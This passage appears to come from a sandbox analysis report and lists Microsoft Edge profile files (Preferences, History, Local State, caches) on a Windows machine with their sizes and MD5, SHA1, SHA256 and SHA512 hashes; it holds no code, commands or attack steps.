ea818e0e7e03ce49f90f7df337931a1c29ca4ed30cad22526d65c31172eccd8a2debc53ecd090a3ed0ca17edb4d95fa16dd672c50d41cfbcbe8538ad881c4005

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

Filesize
24KB

MD5
1a47b4ef035f578b202711efb62cdfbd

SHA1
2621b5f985e39242ae95c5eeec14d277a9694be9

SHA256
8a2ee492eb4145ec61ec563cdb55ba9d5d5e0bda5d430e2c4874b97bfb14f762

SHA512
a89d11a016aff074756e9096ba8ff92eaa66eb7cceb0af7e9a528ba6fd5714b55808781d567184f556bb584c23abd2cf7ce1f9cc2db3269966431a117b6598aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
da279c7bf9668f6dca428f9d8d7b1cba

SHA1
4e190023bfb8f04a27f5b79f628013c47773a283

SHA256
fdaba968ae2a70dc246ef9318ad3a8a477e89191c9d7a902d32d019d11a621ad

SHA512
c7eba111d160701e5dac8c4a2feb2e0769aaeb7ff3b7172daa3815e88a737d9435779e7eb86c0543e9b8e4fadf53662f371a06c89dc92d9d4c3e7e48285e6bae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
7d865cdceab307953df0bb082bfd2c39

SHA1
33e8c3d53849116c6bfd542c32570fca50ce0fca

SHA256
07072066755f64695e558a24fbef3f0f1720c3704ab30a6c1e4705536c347f66

SHA512
29ec59a411527e8e3b7c183547653aba0632edb05739008ad31727ffbd27a3515a32f56a24969d0f54b220ce62ea101098105ddaee4a05f144fe170b69619be7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
116KB

MD5
e5506be3bf050776b3766b3d984db7c7

SHA1
ddc0b74aee78b06eede21c8205d1f7fec04e5d00

SHA256
feb6ac4c67aef91062e7bbcd1ad13e50050236d5adccd79acf64cc964594309d

SHA512
6c9c178671048c8d29916dc745fe1bbfba37efc4b4ecc4bffee6f8ffa313ba30f09dfb5b7213b900e61325e5214dde517aaac49e8fb2c3cc0cc14e8013bf3f3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

Filesize
1KB

MD5
51f105e019f614afe3f7c07834b69dd9

SHA1
987242ca9a18aed77204b1e3d3b537fe142971df

SHA256
8f55dcc234ee208a06db5a1d8c598a492ef78ea3abb81f5a05b3e004ecdc1649

SHA512
cbbd3e3d160ab0a68a7d6e0bae6658fe45aca95a7ca4075a10d8fed9cd73881eca054c917c3fb8c5ff7565395b0ecf742a5f8501d1f5a52baa106038071c7e3f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
383B

MD5
bfa5b8b1de163e48adbf43085c8490b0

SHA1
9c0f9c3682609bffa444c2ea3b6bccc8e7ad9463

SHA256
3902031f63393b96194ab946b3e52849381279781c2a95b0a9e5a03ccc7887dc

SHA512
0d9045b97ad398c9aecaa4ab56d406d6f5560305c93b0a2515c0463a55a7c183eb573b8b34b5304820129bf347d48b521fe6f3b8f8c455586444729758168af0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
334B

MD5
b5a72ceb0206cc579d5d328d53385e3d

SHA1
ad72d927f90a926a16e429b5c7e030e17b3f88e4

SHA256
a52be0676b874eb4e8457127b79607276f1cd0390fc02bb873605dee18430d71

SHA512
f0f4b55a46472efe70574950ee6aed1422ad26b563be4f7c1e71938a9b0d52e624c9375285e6460f1441a0b0d94952e471ef2cfe3c2fe3d8f944b233e2bda5d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
67ac6dd4d11fb3eb44c9ec1c8685b798

SHA1
15a28e1a1c500f646cc4cb0fe1aca08e14a2b107

SHA256
8b01fc8dccaaec2e2c187170ed8b9052f1f9088e31f231cf0224108e0b34a9de

SHA512
0a00ce571b816bc151374d81a6cf46d9f5318816dc15fc8916b011a31b52027341beb23cbaed33092e4b00443b43f3a363d8749ee9f50025535bba2588ccf739

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
460eaa42c8e83910221b66f4dfd5dda9

SHA1
290154e1b8b169e17fd9ed5e7f592998df609042

SHA256
21117eef0fc8209d6511fe94a4626b0eb29a414edbd05bfa824858c9ce935f05

SHA512
3156b3a31300b3838b58b170b7ef16ff9937cbffa48d56486b8f5deccbdb6e57901c7b02aa84b55056c5ea339cf493614057c568f88bfe55e4074d7d0a7f6470

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
6aeea03a41158eab7d6d260c43580d6a

SHA1
fe2bf2acff89c4aaef0d7441ad5ddbe407dbc413

SHA256
20cfa5e2367497996f706c8963a8b8025821845b799d0f4f2e64424b5b91fa9d

SHA512
f333e0d9e934b46df06d3c0c8072c8b27c991879e90149fb9d5ab34c908b1e35e6d3781c8f07ea167dcb2794c3e0eb333a32be9df767ecc6fd26972d364ff688

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
e056517e4a1fa71f9cd77d616662f8b6

SHA1
791524cdee0129cfd70269b47a59567d5a737366

SHA256
779933ae834e988de4e640f8b7e2ce06a26a73602cbc9b854bdca4ccef3c2145

SHA512
44c0bbcea6138fdab747bee669b84706ee0b29f6a2d6b8b36f85fafb3e12097c810519d214ba52eb496beefd0d2360dbe71f2d0ad9b5bafd11efa2b9f2598e1c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
1547b4dda18e08dac33cf2eae9b26d4e

SHA1
0183274119589949024e9c01f35ad637c11035d0

SHA256
d4164439f4acfb72aea88d63fd49d065eda51efddad91136c850ec06c650aa4b

SHA512
9b73bd1ad4a25fc5a5fcda909fe00f622c96c210ce12302c24b9a8c7c96fb386e1636c61d89d0049cce2d67d730724f07853144ae4b2cca50050a2f3baeafe07

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
05eca507dc7afc7a6d541ad991ffedfe

SHA1
4429877d934887f1bd4dadb44a6781301e1d5f80

SHA256
201d92999fb7a498c13bb24c4cead3b82af5a9ef9aef5bca27287a8f8b48b3ef

SHA512
31f6b5d6ebf0e4c151541ff720f9719707561c949aa50d0988b4860dc3ab78de76b62a5e4910ad34163fdebae6c32e51eb9a48583c011c0b250d218857828545

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
44291a3f80bb2a094c7b9354e88d1f90

SHA1
17e1ef021003d894a0886a2252db2985ce9664e7

SHA256
b81e779f91138bc5bf555c7513d00ec1d9f6bebecbd19d49e2ccbd2216171782

SHA512
606a47d0b972826b65f80fa5198f36921275b931d56b8ce52e6899854322077ac78ac517664e4ff51ba0d2ae1a8eb72b2287eabcc2817b0ddc8bc8d750914561

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
70dcd7a849585e908eafbc9d4f9492f6

SHA1
8aa561ebcf794a5ac6441b43ea22d4cfd262d966

SHA256
6eeed90805c0ae9c6b569d909a77b8e64efaa2ca23d0286565ab0ed4f8a42275

SHA512
aa543554c6632c3e3311fc89efe7b3749890f1fd117974159579a122fcccdedc473c64f8ba384d012bbbc1b0921be09015d3eda19258aa4dac74ceeb784da1fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
e6e420f4b1fbfb20a885661e951e99dc

SHA1
cc1f0ded83cce0efeb08fbf671cd7c521caec870

SHA256
36dcbeeb48aaccfebbfff4965204062ffbd70521f0600c511d8be04412f0b19f

SHA512
15b1228f19ff87d080beaaa5b00c468d8d18f261fae4d49fc6f46624c4e0c08a37526ffb4ece0d257b7f24a263f74518121b12fddf9a46fe9bcaf99bad9dde6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
8e53c5e79d9cebbfa9d0a5a2a2da5897

SHA1
58d20555c9067d7c4e6001b8fc802a1d9c1bdacb

SHA256
e00d4b501db1289217fd69f4d40a478502324e9c2257e8d7483c037e69f16e3c

SHA512
23884a870d517e48fb3268c983b955f115aaa519358ce88bbaa7705b23328478fa48750d50fd584f51e979fe6c66040dadedfea37becb0ea8c2653d5ac02121d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
aa7f2606d171efee6910419f1ac01983

SHA1
e3080691f143e3846b4e825bfe443227428c05e6

SHA256
be7f77d0d80a1353150880ffd14ee59d5bd3bdb2c3d3c446c4d9c8b48e46b08f

SHA512
6ef3de103d6d562e3c6ca538dbc7997b040fbe2029faecbacd45d48d198bfe8feb6a8950c12779118c60e7f60f18a2603bc8b941979b2ab5fa0ae254c17e7dc2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
d9f6c72404851ed0aa7003c9999904cb

SHA1
6e0b32fc5e0d5c734a805edcb56d84e030d91609

SHA256
8c5708c063f999ca00113465bc79b62a29452e41ff08589304b8110291533deb

SHA512
b07691a88c0966fb0a85baadaad73f7a0da82bbc569b290d85e18f6be219b447c43ae854df2ab8296c6d815381a27bcfde23e4bc9e995eeb4cf44fc704a86fa2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
8ef8480a50771a3864715cd06fa93d99

SHA1
4637c79b95a4dd173d04e03e48f47f7c8a1c3582

SHA256
f6f67ea1a84fdff390daecda53c3fb8e24c7ed342cea5af069dfc193d51d8aac

SHA512
2aa4e4534e727499d562d5075ea6af6a5cd7066a66b4456cef56aef3d9639ba239ab023c83cb09fff460323afb6aac937d1171e4a1ca5aba778419cb290a4c7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
59379b08a38e700e70a73c1fd95f3b9d

SHA1
f5b7c5b2ffbac3cbed48899816180d8de5d74166

SHA256
76d6bc8dc0ca3496d2c662ad51c73ea0ae3df14c968a724f6ae7d311a8876c01

SHA512
bbac9a69a6a8ab88d6fd9bd6f4725c23fc1e9c49bd3a25c40ae937b6a9bbe697ec06e134a16ceeb56ce5ef57384aae696a0985c157376ad4be2fb711503255de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Filesize
873B

MD5
f7bade9aca88fb0719f265ee37c723b6

SHA1
d860bf9199651bde51c7d71c705e8abf8532bf1b

SHA256
f11666dc64ae44ac8914d879fd4d9753fe363b2508bf3a361cff4f7fb5f3e232

SHA512
96150d31be5245286e3c34b16fcd068bf96017fcc8cabc653662f97da541e9d52602774efb72de6a7e2efb1f5c3d5deaea17ad6e37cc9d12b2c7f6620c71d36a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

Filesize
295B

MD5
3e4f2b84a88e16b799226f19998a8e4d

SHA1
24f084b9d3a474e4bd7f6e2711d6b37524ddccc5

SHA256
23a9e48cbe9a729418bcb200b1c92f92e93ae742f52364822536dd9f23aa89f1

SHA512
de7e3d7297157790ec6dfd0d262212d9e0804db2cf1eb03abe37b19c096bd36ea87529ed0603045a20c4fafd993b120dd1f6092e409d90d970693b0f7ab7f872

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
9093dfe1122da3091ccb1ab1e0a6e0cb

SHA1
7753fdd51eaf265e5ce29c58595c1fc4f127328a

SHA256
73458a66fa63d7d60a47efb5bfbf93ca57ae986c03bc2699782246023b780105

SHA512
4aab9041d9219336b5c693448b1baa5dcd046a5b5981490d685a60b4e70d32bbd0b4fc2465df1cb331f4c20c36fbf81ce0864b8f3f582018541a4bb06cc1fa4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57c5f0.TMP

Filesize
48B

MD5
a5dda703229c9c1b354401a4798a3f64

SHA1
1dbd573d7d944519ef62b3fab940dcb22f52d749

SHA256
198ffdc0b693bbc13340714fdbb6dddc6412aa490dd9f84d7e32e5cf066763e0

SHA512
fbfb3ad96249230abd58d1b826feeb354f695cfa47f12c3d078d85bfd460e74bcbe8e8aa3682fb143c432c0b7648a71dcb8851a82286ab87c556b6f5c49d5306

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Filesize
609B

MD5
4d171a04f441123b760b3bce08125e5e

SHA1
1e955b0c697e94a4f6b42ff2d8da9270ecd6feb3

SHA256
248938d31676acd28ceef20a17d692f825148a2fd1e40ad2d45e846adffaaf3a

SHA512
d118d841d3734b71bfcbd839344cf3dea88de33c66a727a5203cab58aa9fc326b4573897910c4d40bd7e1faed4bd8231082a376508288f5add4df2d715ca9198

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Filesize
322B

MD5
5f7b88f39fe56024fa4b162dcacdb426

SHA1
424dbb24fc512e76c7b182e66ac2f25de401a4d3

SHA256
e88e825f12b2d609099c009953c64fb840744f8808cc2ad9b66af1722cd5838e

SHA512
8ed58e9832101fe0c9983bf350c06718563ae6824a4cd537325f0c9ba7f218cc59106abdb9a0f7beaac9c86c77e0a47b50a48e550a8c7c4497e6820a633dfd06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13367395810340865

Filesize
11KB

MD5
f842dfc94c5892bdb7029518cb352be5

SHA1
86901b88665a8bac9191c9b37dff1733024ffddb

SHA256
d30820f740455ebb034eaa37b92ec02b90c1c615904556d08ad8ac15a486a1b1

SHA512
54aad34d5c151f13e7da81e6df8c5d650d77cfc175c34df76d8af14bbadf6146685b441eefae668e3ed1ce7d84a97c4b262b9ce12887d047af5b165b40974c63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log

Filesize
184B

MD5
2165df0f5070e80de43dac7153a0e490

SHA1
113cd07070a2f293fcaad9ee7cff716c12e6b922

SHA256
1fd20d7c577097f1a3d0e5ab21061890b004dbda124dee1cb8aaecaa10436fac

SHA512
14829dbd2b82eb43105fd7a774541ba8b485798f18cca18f5d2b62f8367514ad887d618c937b6fec26caee5a9c588c956c9c474f4a23f7848f55053bf7eac7b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
350B

MD5
7e1f8afdb915a2a44bea857d1a45e795

SHA1
d93fcf53cb87ed96de205da153e7166fc4640b5f

SHA256
4fce946dc8082d46012c2ac2680388ace5797d6a9dde2b91a8132ead6d6d528b

SHA512
7aa52a95ad5861eff2c1e4f6b902f269ca9e7fe8310f5ba0c9342cb07577c8ee4d53e633b3d9141bbda1463293d7e6eacac179d022bf2fb84aaaa4a10ad8a6b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
326B

MD5
bbea782cf0376ec4b02e8679d8fecadf

SHA1
b614f7ded7ff8e78591482d2872685a0f62f51c1

SHA256
b61688b2a6581519c75b37cbbd4f23a1d16f60f64e2630c8e6ec8adecf784d87

SHA512
08df997eb7f42482ccf58de5388d8ecfc622daaff035b227ef28b7d3795633dbf06e38eb5bea8ea54d026fe2d4fef4b395105867dbf4fc716d83d7612395d531

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
b53be3b6ba6ddea57e7d90bda37f1db4

SHA1
5d6ef2c72e4f9c0470bb67b3d25ec046e6108c42

SHA256
636ef4d67f4d4a8cf8d7899bf9b4119a1c25a2bfb5b3fc3da21436b371e66da4

SHA512
3b23f3bbbe6982deffdb84affa59302ea68a7e2cbee45b25c35aee69dc8d9031e0b06ac6404cde1bfde1cf3b8679ab9227694955954f747962849d926cbd417f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
3434c0f3016eb88a31fe3e949bdb6365

SHA1
5dac7bd9bdc6ad1ceef3e9e446119c1d3dd32ea3

SHA256
536baf4b82545d5c85e1601301fa60a62179418022b63701f0bb15335c5c2c95

SHA512
61da62b01de7d1d7a843a7906e06571117d6ea6f2a12577273f02dcd4e984ba3f7de5607a31531008dc8a64a112f89e49cae0fa032e74f8514c5a54e93e58770

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
b3a47bd80f3af46195d6c7cc77832132

SHA1
b2aede234109fef4ed20bccff5e260a74024e04f

SHA256
872e9d518fcaa8abd4a81cff9612b8cd51e9146c2966ed0dc2419591a9456025

SHA512
a415d9fe0b6630c5508509065314a721fbc95cc99603bcfad1e8d548b19aad1cddb7ec7c3dd877dd89749115596f308aa14d0fda386f778920baa8eb89fbec1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
d9dbc88805e43319aee13ebeb2ee1e7e

SHA1
026779d41d73ee0476d237331073a1780beddc6e

SHA256
38b5c1b19f7e5ce5229bfcd27c68011d0d6299d0c8f4a6ab811c42af3a766c8c

SHA512
248b95208873e0dbf016c92cd9b4b344f1d43fb829d3ffe669c99f6874cd880da40ecf259294582534cd9724dff55e7063179347f7b9ae2039f6de7aace70dab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe580ba3.TMP

Filesize
537B

MD5
70fe91dab63eb13e7a152d343b326cfa

SHA1
66098c2776578aa572b82d4a11ceba6035d00524

SHA256
ba490b7944aea0446d0f343aa2cabfdaacaa5360856e0ee38f561799393a28ba

SHA512
ad2b2f52a6472b2ef21473d67f79176eaa0a8a5ddacfbe29747a9f244a54bd138b5d1d72e34011f3b2786002cfb885056a847f284671bd2afee9f4f57e498837

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

Filesize
128KB

MD5
4de6e1a48b3dbf7ac72b1072a5a38c2d

SHA1
f860ba43a78ed4ae81c9c5e5d99dc95e43e9788a

SHA256
566d2da31aca8ad5d6347f0f725c4da432a3d0d1d32e967d1af46cb964c8b181

SHA512
075058b767a1dd2853440361900fb6be59a5026e5dc14f5a2e22b01db848e7f0203a1dfedeee6f42ec52b392e97f3b5855f6f3250f86272710a305b550ebe534

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Filesize
112KB

MD5
816a04769ca06f16aee09853d9ec3ded

SHA1
5067867d735d4dcae91b638fbb8e2d55e022f659

SHA256
4037ec0582e0252e5e794b3273d13a249ca2b9c8a30bea4b87c98465bb8437b1

SHA512
dce045aab0a3c7e66a4ca20afcfa840a67e155b09acd8633fa343b296daaf270c08f530f25adda267abfed6b627da008c1d114126b5e5f4847ced2874962a642

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\c47e5f61-e0e8-4cea-92b4-82f532eeb06f.tmp

Filesize
6KB

MD5
f96581db313ee0962e0539e5d37eddfa

SHA1
11ed8d96a62b8ada7ac6230ebbe04a533a3cef68

SHA256
d7e59f499e099af8ec2f1ff70f71a4d8655aa5c15c236864003c6978e165ba4b

SHA512
a45400e7b4cc03a9d9ea1f76a09afd0210c605f44696577b6fc6ee749479cd00243e07dca166fafb3205301c611cae6ccfb99686ae5b2b91a5c8402d6d04dcd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

Filesize
64KB

MD5
549407ae89b7ec201664fa1ad471476d

SHA1
d9d221b5ff356670664a5b30d266225eaa77214e

SHA256
57d0894a86501319176c19287db9c861985f969460a13ffd9d2bf36c8239437d

SHA512
9f2c703a3c13159d315ae0074f326a21a80f1ed46a359acd810b1c8401b3f611cf906be24f54833c8033204988ce86a4a5ac20c4a664d1c7406bfbe8b88dc476

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Filesize
179B

MD5
311c7bb25d64fb232a0e6c86aa2673bc

SHA1
5e3586b27a8706d04a4f55f52fd690e67407949b

SHA256
a09f57f3a98ff4c473276e6c1c043228d432e36de6ebd8ebaa3fa8ac5fb5bf12

SHA512
1ce9a07c1d5964be84d70bf3a28c079ce6d793cd6cf791cca752b983f1f0b9dc7b76dc2ae4853b5b06bc05f02bae8ec8cbf800226f5d92e077bfcbc2be3e7c8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Filesize
319B

MD5
0d5e1195c1ed221032d3e2cbc87077b2

SHA1
dcc689d110959b47ae07cfe21a09ba54fb10f4fe

SHA256
7e0146462e55d85c2641830729a2426629a4b0803bcda8412383d1570f1629b9

SHA512
3120ab3d50b062f1d3f5074deeb2182481d3e0623d1f9e9b83928fba7fa599d4544ea4e6897e5c7a15e35e1c85bb2ad5f353f59651b95fc9c8a40bef829d29ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Filesize
376B

MD5
9923a76bde324d1cbce163d80f22ca58

SHA1
721d9b4627f6e05750ca81399d008a1ca78b6b5b

SHA256
8468ff5517f89767f7c0b1e19d711d9e9cc7449bc526c701909087f4c3ca99dd

SHA512
ee54c022d0ed9ee9c7539270b7493663fbc93e42b83e5c05e7f796a33486eebc52456209f33f4e5e5662581c8e5ddfa0e20d11627e0fba882b30ec05127a9ce1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Filesize
337B

MD5
9cb423847f6c1386a0f24015eb0aba6a

SHA1
3e3b05a4b1af5cb62e5094f4134aa0b5bd63cd9b

SHA256
905706374b58f167bfa0f7557c1fa1035ff55cedbf9c90370c9dcaa0b1da9378

SHA512
979e20f632aec42bf1b6e61d1a9454258b143826d56c555ea86153d9f1ce27a42de2cb5867dcba16f3dd6e8ed50caf383dd92f0197260ce91c817204daf51643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

Filesize
44KB

MD5
eb0d8c4a7c712da969619745d575f9e2

SHA1
e2e7f3c7f0476aa2a38f79035704e1ae378ca0bb

SHA256
a621f668b7c246883c86b5eecdd34b15e78ea469cfb57b435a893bfd983ddc9f

SHA512
4815721255b0c9d1ef1c149dc54dcf0d0889522de23b34bd665d9ad1cb24fbe25bf3306c0c2717910660fe3256863d16b6998f62c7956dde8390ce7c685bace8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

Filesize
264KB

MD5
7ead93de932a6b96811829b96c542b27

SHA1
3a81cedcb9b0a7ea16a26efe542a22949644c315

SHA256
dad5213163e6ffdf0141c1cbe076742d277f72f9062823f16694a9ca02e72239

SHA512
e611b7992f5d481b4e6c3dbccba6cf8696980948436bbc92e5b9be1f3d57dd75551c22edeca87566e823882991f80815c973dfc5fb18ddabdf4c83d245e0f049

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

Filesize
4.0MB

MD5
8749701b6d6732e5ce3e9f4b22684c17

SHA1
53062054d0b909b5fdaf8b937467cdf2017f856a

SHA256
2485a90b95214c47fd47a1471e24a3005ecddf095abbdd66da4bbb2c539ea60b

SHA512
24e8bf09882ca10c6cb1184dd2de8d086006453f291d7ea90615d135a08f3fa28114ee68d36d7d6e03f8c801f7423e287acfcd9a3da6841204354e3ab6a38eac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
11B

MD5
b29bcf9cd0e55f93000b4bb265a9810b

SHA1
e662b8c98bd5eced29495dbe2a8f1930e3f714b8

SHA256
f53ab2877a33ef4dbde62f23f0cbfb572924a80a3921f47fc080d680107064b4

SHA512
e15f515e4177d38d6bb83a939a0a8f901ce64dffe45e635063161497d527fbddaf2b1261195fde90b72b4c3e64ac0a0500003faceffcc749471733c9e83eb011

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
877a89281761b7a5d746b0fe542ba1d2

SHA1
49ecc66f350aa924afc2623333738f17bb00d11a

SHA256
5fdcc61812b9fe67bd9d3552744308d8c9318f8ca3a79e381f10091ac0a96d4b

SHA512
ce9249bbcf77cda68e981c99c20c961ffa951a3e1153e13fe13bab6aab9acaaa22b4141ff8fa932e0786b68ecfe28ff0116b3c0085a8deb390418d938d4c4d47

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
1e7e366e99fff1b4d861efe25138605a

SHA1
bab6a7530e3fc28403ca84e049a0716c3a94f45e

SHA256
1639f3058ce3cbbce1aa48cc4910ed0d9ad61a78b9d9fbd207fcdda727390796

SHA512
bffe65a2a3acb6de1e4c0962a64d4279a520584da03d8277d58555ba64ad298be1656c6b8935a5c753fae37442e4594bf7068f4ca1ce4e894cc903db0038c6fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
e48f47f82e98e787d705aa42cece371e

SHA1
d08a469bec0ccef526d6a4681da3826ecc2d7808

SHA256
f5ebad34a7df282c53881b2555c1493a07bd54a2b3f733c7bb7f0a623a73c3f1

SHA512
ae207df85d4d817fc21367d013898699d09a064beedcf1da5d4929f993570b1e47616f45fa2eff8ceba421c40cb5bfb674483e98df3ddd394126060f7d5d6404

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
29370a4e0ce1a6373686acc0704c2fcb

SHA1
3547ecec4f37b8283039170014cb1fc38cd8fd87

SHA256
14d54d88fc9f1a7c598a4ad315678cfec7fa1ef26abd7305775c536d3c1cae67

SHA512
81cc53683fed7cfecf4b069428c42a546234ac218d36d06d38a5e3c557436c1aa3fbb74676473f10569274303a76678393efa6270b65e1163321dd3b2f012ffe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
082469b0ce079456dfc330c6414d1c3c

SHA1
0a063f411d12c2397102533bc396887fc1657e2e

SHA256
aa56e56643d84ce29efd0c4f7cfade67be8f10214e6beb03973496f5a04622b9

SHA512
7b3964c45122810749e055385f3b9670cbffdb0048cf2af69e17e37ea9f978fdb7321090d65a50add642b59514fe8068cd18a2fae8b0d19083f29249cc6af3da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
1743b137fc55b85458fffa7d90eddc7a

SHA1
539dedda30935433f8ac8754413b09d56d408944

SHA256
5847c0beb7bda61f49051677130412d8a7c74b1fadbdd8911439c4e8c7221889

SHA512
3eed3c11ff4eff8b6dc98580fc85cbb18503a3d8e5bc1f99229d51691c68975e7c38e072ea49e5cbb352ae33c5da83faeb4d4b09357511cc55e9f1014f414aa8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
